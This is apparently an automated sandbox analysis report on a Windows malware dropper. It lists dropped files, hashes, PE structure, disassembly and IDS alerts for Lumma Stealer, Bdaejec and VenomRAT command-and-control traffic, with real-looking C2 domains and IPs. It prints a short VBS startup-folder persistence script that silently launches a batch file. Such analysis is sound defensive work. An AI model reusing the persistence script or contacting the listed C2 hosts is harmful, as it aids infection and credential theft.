Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{816DBFA2-37EF-48CA-81EF-C8D4760A42C3}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{90B967A7-2931-4F6E-8D27-0FE70883BFCE}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{C16C90C5-330B-45BC-A499-31106BAD28D9}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{D3CD3048-0877-4280-A1E8-DA25C7442B6A}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	246
Entropy (8bit):	5.128117648119024
Encrypted:	false
SSDEEP:	6:j6NqhmCOoLPFi23fa3r0XeFi23fa3HfNUqOUrv:JhmCOiZS3ruAZS3+O7
MD5:	1C3EFFC625546E497DBF40981B93250B
SHA1:	E4F409137BC3B469C1FEE6D3898581EBC1A753CB
SHA-256:	511033C6D8A15C31F0C3E3281C4B8AE27EEFE5E474F88707121CF2C5AE1A136A
SHA-512:	C5D38C9AEE3606F3D44B42DA301ABAD47091BBB1B593445B63957835447BE1C9F2BEB8518AC8EB57A7C482E08A91DC2D090ECB22FD0BF3677F944A328475CE7C
Malicious:	true
Preview:	Set WshShell = CreateObject("WScript.Shell")..WshShell.CurrentDirectory = "C:\Users\user\AppData\Local\Temp\ExtractedVenom"..WshShell.Run chr(34) & "C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" & Chr(34), 0..Set WshShell = Nothing..

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\AppData\Roaming\ftejced

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	186368
Entropy (8bit):	6.613118398873433
Encrypted:	false
SSDEEP:	3072:xAL4MQSsrTe/6ocp7B8WvYmD/5yW5VXU/2PE9wXGCH:eL4KspNjVhPS
MD5:	779806A66CCCB6B37A02F6B30F7AECF3
SHA1:	0A16526E664EBCFADB6B958580AA12B3DEFF8645
SHA-256:	F42503B4678644E3475344042DAFA742E5F3D2D75A7C16409F10D7BCCA17E028
SHA-512:	40C6234EB7753D9CBC4E98BC964B61E8A7B1CA9D97B4314B3F7CBD03060517AE5F5561E33F9334E43C0F74FF8449A795DE38F034541E8FBEB4E58661568DADCB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b{...(...(...(...(...(...(...(...(...(.(w(...(...(...(...(...(...(...(...(...(Rich...(........................PE..L.....we.............................P............@.........................................................................\|...P....p..................................................................................x............................text...\p.......r.................. ..`.rdata... ......."...v..............@..@.data...<c..........................@....gigug..\|....0......................@....nigabu......P......................@..@.hud.........`......................@....rsrc........p......................@..@.s...up..P...P...B.................. ...................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ftejced:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.296076396592429
Encrypted:	false
SSDEEP:	6144:N41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+U4mBMZJh1VjT:61/YCW2AoQ0NiG4wMHrVX
MD5:	D446B43E1B2D7D79495DD20182728719
SHA1:	169819740B5D0B6DA1AA894D3B5344FB799D3D0E
SHA-256:	21C18ABD077000A494A255ABDB76CC48D86EB9F75EC6FF7E3F6BA917950B5EC1
SHA-512:	D00D38FDFA07FE89D53A7A296F934CD2D93881C5540E71B290346A54812B6F61325613463CC89C6E10D7017259D0555573320CEA5D909DBF539E93A2DDBE5436
Malicious:	false
Preview:	regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmvN.................................................................................................................................................................................................................................................................................................................................................."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.613118398873433
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7Y18r(14).exe
File size:	186'368 bytes
MD5:	779806a66cccb6b37a02f6b30f7aecf3
SHA1:	0a16526e664ebcfadb6b958580aa12b3deff8645
SHA256:	f42503b4678644e3475344042dafa742e5f3d2d75a7c16409f10d7bcca17e028
SHA512:	40c6234eb7753d9cbc4e98bc964b61e8a7b1ca9d97b4314b3f7cbd03060517ae5f5561e33f9334e43c0f74ff8449a795de38f034541e8fbeb4e58661568dadcb
SSDEEP:	3072:xAL4MQSsrTe/6ocp7B8WvYmD/5yW5VXU/2PE9wXGCH:eL4KspNjVhPS
TLSH:	80046A2136F58336F3F39A746976A3A04B3BB8737970C1AE2250261B1DB27C19D96713
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b{...(...(...(...(...(...(...(...(...(.(w(...(...(...(...(...(...(...(...(...(Rich...(........................PE..L.....we...

File Icon


Icon Hash:	cb97374d5555599a

Static PE Info

General

Entrypoint:	0x4c5000
Entrypoint Section:	sup
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6577A990 [Tue Dec 12 00:30:08 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	61aeaa8ec5698536c7a8f0b1ac00ff47

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 61445849h
mov dword ptr [ebp-44h], 78652E49h
mov dword ptr [ebp-40h], 00000065h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F9868C2FD65h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFF3C42Ah
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F9868C2FEAEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F9868C2FDB4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F9868C2FDABh

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1a87c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb7000	0xd6f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x178	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1705c	0x17200	2c4963a1d9da63e08d44b1c689076c92	False	0.7984375	data	7.471980252090664	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x20f2	0x2200	99184cfdaab82b64a7e97e96a5c88e4b	False	0.3639705882352941	data	5.473318112162758	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x9633c	0x1800	205c00fa550d2a1f0770471be61a99e3	False	0.14876302083333334	data	1.603367657716206	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gigug	0xb3000	0x107c	0x800	c99a74c555371a433d121f551d6c6398	False	0.01123046875	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nigabu	0xb5000	0xc	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.hud	0xb6000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xb7000	0xd6f8	0xd800	e937ba95089411c105e86e3fac649da3	False	0.5247757523148148	data	5.190943274302459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
sup	0xc5000	0x5000	0x4200	88ffce8ba42ffb9123d9b2c928068a3d	False	0.7775804924242424	data	6.934340827164694	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
DEMAFE	0xbdee8	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6257367387033399
RT_CURSOR	0xbe300	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_ICON	0xb76b0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.6108742004264393
RT_ICON	0xb8558	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6908844765342961
RT_ICON	0xb8e00	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7505760368663594
RT_ICON	0xb94c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7933526011560693
RT_ICON	0xb9a30	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5911825726141079
RT_ICON	0xbbfd8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.7216228893058161
RT_ICON	0xbd080	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.7368852459016394
RT_ICON	0xbda08	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.8829787234042553
RT_STRING	0xbe5f8	0xd4	data			0.5943396226415094
RT_STRING	0xbe6d0	0x78c	data			0.42857142857142855
RT_STRING	0xbee60	0x572	data			0.445480631276901
RT_STRING	0xbf3d8	0x596	data			0.44265734265734263
RT_STRING	0xbf970	0x214	data			0.4906015037593985
RT_STRING	0xbfb88	0x876	data			0.41043397968605727
RT_STRING	0xc0400	0x744	data			0.432258064516129
RT_STRING	0xc0b48	0x55e	data			0.4497816593886463
RT_STRING	0xc10a8	0x7c0	data			0.4178427419354839
RT_STRING	0xc1868	0x69e	data			0.43565525383707204
RT_STRING	0xc1f08	0x7b6	data			0.4204660587639311
RT_STRING	0xc26c0	0x540	data			0.44494047619047616
RT_STRING	0xc2c00	0x590	data			0.44803370786516855
RT_STRING	0xc3190	0x710	data			0.4247787610619469
RT_STRING	0xc38a0	0x6c2	data			0.43583815028901735
RT_STRING	0xc3f68	0x720	data			0.4243421052631579
RT_STRING	0xc4688	0x6c	data			0.6481481481481481
RT_ACCELERATOR	0xbe2e8	0x18	data			1.2916666666666667
RT_GROUP_CURSOR	0xbe430	0x14	data			1.15
RT_GROUP_ICON	0xbde70	0x76	data	Turkish	Turkey	0.6610169491525424
RT_VERSION	0xbe448	0x1b0	data			0.5949074074074074

Imports

DLL	Import
KERNEL32.dll	GetConsoleAliasesLengthW, CreateJobObjectW, SleepEx, GetCommProperties, GetModuleHandleW, GetConsoleAliasesA, GlobalAlloc, SetVolumeMountPointA, lstrcpynW, GetModuleFileNameW, SetConsoleTitleA, WritePrivateProfileStringW, ReleaseActCtx, SetLastError, GetProcAddress, BuildCommDCBW, GetAtomNameA, LoadLibraryA, WriteConsoleA, UnhandledExceptionFilter, InterlockedExchangeAdd, SetFileApisToANSI, AddAtomA, OpenJobObjectW, FoldStringW, EnumDateFormatsA, lstrcatW, FindFirstVolumeW, LocalFree, FlushFileBuffers, CloseHandle, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, HeapSize, CreateFileA
USER32.dll	GetProcessDefaultLayout
WINHTTP.dll	WinHttpAddRequestHeaders

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T19:56:24.675453+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	49733	80	192.168.2.10	64.190.113.113
2024-07-24T19:57:04.292679+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49772	443	192.168.2.10	188.114.96.3
2024-07-24T19:56:50.332358+0200	UDP	2054591	ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop)	64465	53	192.168.2.10	1.1.1.1
2024-07-24T19:57:26.536004+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49790	443	192.168.2.10	172.67.213.85
2024-07-24T19:56:56.104324+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49762	443	192.168.2.10	188.114.96.3
2024-07-24T19:57:18.343059+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49780	443	192.168.2.10	172.67.213.85
2024-07-24T19:55:04.239382+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	51349	53	192.168.2.10	1.1.1.1
2024-07-24T19:55:06.316845+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	51349	53	192.168.2.10	1.1.1.1
2024-07-24T19:57:02.045424+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49769	443	192.168.2.10	188.114.96.3
2024-07-24T19:57:31.288308+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49793	443	192.168.2.10	172.67.213.85
2024-07-24T19:57:36.718743+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49797	443	192.168.2.10	172.67.213.85
2024-07-24T19:58:10.395667+0200	TCP	2052267	ET MALWARE Observed Malicious SSL Cert (VenomRAT)	4449	49821	94.156.79.190	192.168.2.10
2024-07-24T19:56:52.823568+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49756	443	192.168.2.10	188.114.96.3
2024-07-24T19:56:51.530840+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49754	443	192.168.2.10	188.114.96.3
2024-07-24T19:57:17.023516+0200	UDP	2054593	ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop)	51893	53	192.168.2.10	1.1.1.1
2024-07-24T19:56:57.773404+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49765	443	192.168.2.10	188.114.96.3
2024-07-24T19:57:40.123477+0200	TCP	2054604	ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)	49800	443	192.168.2.10	172.67.213.85
2024-07-24T19:56:52.312670+0200	TCP	2054602	ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)	49756	443	192.168.2.10	188.114.96.3
2024-07-24T19:55:40.357738+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49711	799	192.168.2.10	44.221.84.105
2024-07-24T19:55:43.508123+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49716	799	192.168.2.10	44.221.84.105
2024-07-24T19:57:40.591985+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49800	443	192.168.2.10	172.67.213.85
